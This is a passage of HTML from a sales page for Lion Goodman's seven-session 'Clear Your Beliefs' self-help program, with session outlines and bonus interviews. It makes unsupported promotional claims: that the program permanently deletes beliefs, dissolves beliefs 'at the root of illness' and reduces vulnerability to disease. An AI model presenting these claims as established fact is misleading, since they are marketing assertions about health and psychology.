left"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px;margin-right: 20px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px;margin-bottom: 5px" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a 